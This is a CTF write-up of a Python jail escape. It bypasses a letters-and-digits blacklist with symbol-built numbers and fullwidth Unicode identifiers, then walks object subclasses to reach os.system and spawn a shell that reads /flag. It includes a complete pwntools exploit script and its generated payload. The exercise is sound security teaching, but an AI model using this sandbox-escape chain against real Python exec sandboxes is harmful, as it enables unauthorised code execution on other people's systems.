pyjail escape without ascii characters and numbers - bluehens writeup
the challenge
The challenge code consisted in a very short python script, running behind netcat
blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
security_check = lambda s: any(c in blacklist for c in s) or s.count('_') > 50
while True:
cmds = input("> ")
if security_check(cmds):
print("nope.")
else:
exec(cmds, {'__builtins__': None}, {})
For the uninitialized, this is a very common pyjail setup:
-
The
security_check
function makes sure the user input does not contain any ascii letter or number -
if the input is valid, it is executed in an environment without any builtin
-
By looking at the challenge Dockerfile, it’s clear that our goal is to read the
/flag
file and print it
python without letters or numbers
The Javascript language can be written using only combinations of the symbols []()!+
in a dialect known as jsfuck.
Unfortunately python does not reach these levels of greatness, but it can get close thanks to some quirks of it’s implicit type conversion system:
False
=>[] > []
True
=>[[]] > []
0
=>-([] > [])
-1
=>~([] > [])
1
=>-~([] > [])
2
=>1+1
=>(-~[]<[])+(-~([]<[]))
With some creativity, it’s easy to create any number. There is the possibility for a lot of fancy optimizations if you are allowed to use *, <<, >>
or other operators. The current challenge however does not have a payload size constraint, so we’ll fight the urge to find an optimal solution, and keep everything as simple as possible
def craft_num(n):
"""
craft symbol-only numbers, in an inefficient way
"""
str_0 = "-([]<[])"
str_1 = "(-~([]<[]))"
if n == 0:
return str_0
ret = f"{str_1}+" * n
return ret[:-1]
Unfortunately this is where we meet a wall, because python3 does not offer any way to create strings or execute statements with symbols only.
That was only possible in the age of python2 thanks to the
backtick
(`)
operator, now removed from the standard, that acted as an alias for the repr()
function.
filter bypass using utf-8 identifiers
If python3 broke the dream of a symbols-only python dialect, it also brought
UTF-8 identifiers to the standard.
In our case, that feature is good enough to bypass the no-ASCII filter.
According to the reference:
Python 3.0 introduces additional characters from outside the ASCII rannge. […] All identifiers are converted into the normal form NFKC while parsing; comparison of identifiers is based on NFKC.
what does that mean?
The Unicode standard supports the concept of equivalence.
If we look at this useful page for the codepoint for the letter a for example,
we can see a long list of symbols that are declaratively similar in appearance or meaning to the ASCII letter ‘a’.
Here are some examples:
- U+1D4B6 𝒶 Mathematical Script Small A
- U+1D4EA 𝓪 Mathematical Bold Script Small A
- U+1D552 𝕒 Mathematical Double-Struck Small A
- U+1D586 𝖆 Mathematical Bold Fraktur Small A
All these fancy codepoints will be converted into the correct ASCII letter when normalized, which is an operation that python3 performs before parsing an identifier.
And that’s it! A lot of words just to say that we can bypass the filter by converting all the ASCII letters in our exploit into italics!
The following function automates the operation by converting every ASCII letter into the equivalent
fullwidth letters
def denormalize(str):
ret = ""
for c in str:
if c >= "a" and c <= "z":
# https://www.compart.com/en/unicode/U+FF41
# weird fullwidth a
# the first of a sequence of codepoints compatible with ASCII letters
weird_a = 0xff41
offset = ord(c) - ord("a")
ret += chr(weird_a + offset)
else:
ret += c
# replace all underscores that are not at the beginning of an identifier with
# https://www.compart.com/en/unicode/U+FF3F
# fullwidth underscore
ret = re.sub(r"(?<![\.\[\( ])_", chr(0xff3f), ret)
return ret
escaping the pyjail
Now that we have the ability to fully bypass the filter, we can write a classic pyjail escape payload and send it. This is the end result:
from pwn import *
import re
def craft_num(n):
"""
craft symbol-only numbers, in an inefficient way
"""
str_0 = "-([]<[])"
str_1 = "(-~([]<[]))"
if n == 0:
return str_0
ret = f"{str_1}+" * n
return ret[:-1]
def denormalize(str):
ret = ""
for c in str:
if c >= "a" and c <= "z":
# https://www.compart.com/en/unicode/U+FF41
# weird fullwidth a
# the first of a sequence of codepoints compatible with ASCII letters
weird_a = 0xff41
offset = ord(c) - ord("a")
ret += chr(weird_a + offset)
else:
ret += c
# replace all underscores that are not at the beginning of an identifier with
# https://www.compart.com/en/unicode/U+FF3F
# fullwidth underscore
ret = re.sub(r"(?<![\.\[\( ])_", chr(0xff3f), ret)
return ret
def craft_os_str():
"""
payload for generating the string "_os"
"""
underscore_str = f"().__init__.__name__[{craft_num(0)}]"
s_str = f"[].__doc__[{craft_num(17)}]"
br = "{}"
o_str = f"{br}.__class__.__base__.__doc__[{craft_num(15)}]"
os_str = f"({underscore_str})+({o_str})+({s_str})"
return os_str
def craft_bash_str():
"""
payload for generating the string "$0"
which in the challenge environment is equivalent to
the command "/bin/sh"
"""
num_0_str = f"({craft_num(0)}).__doc__[{craft_num(33)}]"
bash_str = f"'$'+({num_0_str})"
return bash_str
expl_find_FileLoader = f"().__class__.__base__.__subclasses__()[{craft_num(118)}]"
expl_find_os_module = f"{expl_find_FileLoader}.__init__.__globals__[{craft_os_str()}]"
expl_shell = f"{expl_find_os_module}.system({craft_bash_str()})"
expl = expl_shell
expl = denormalize(expl)
print(expl)
conn = remote("localhost", 1337)
conn.sendlineafter(">", expl.encode())
conn.interactive()
when we execute the script, it will generate this huge payload:
().__class__.__base__.__subclasses__()[((-~([]<[]))<<((-~([]<[]))<<-([]<[])))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[]))))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[])))))+((-~([]<[]))<<((-~([]<[]))<<-([]<[]))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[])))))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[])))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[])))))].__init__.__globals__[(().__init__.__name__[-([]<[])])+({}.__class__.__base__.__doc__[((-~([]<[]))<<-([]<[]))+((-~([]<[]))<<((-~([]<[]))<<-([]<[])))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[]))))+((-~([]<[]))<<((-~([]<[]))<<-([]<[]))+((-~([]<[]))<<((-~([]<[]))<<-([]<[]))))])+([].__doc__[((-~([]<[]))<<-([]<[]))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[])))))])].system('$'+((-([]<[])).__doc__[((-~([]<[]))<<-([]<[]))+((-~([]<[]))<<((-~([]<[]))<<-([]<[]))+((-~([]<[]))<<((-~([]<[]))<<((-~([]<[]))<<-([]<[])))))]))
Then pwntools will automatically send the payload and open an interactive shell, from which we can just cat /flag
the rest of the owl
If you are confused by all those underscores, I suggest you to look up the basics of classic pyjail escapes. Others, far better than me, have explained that magic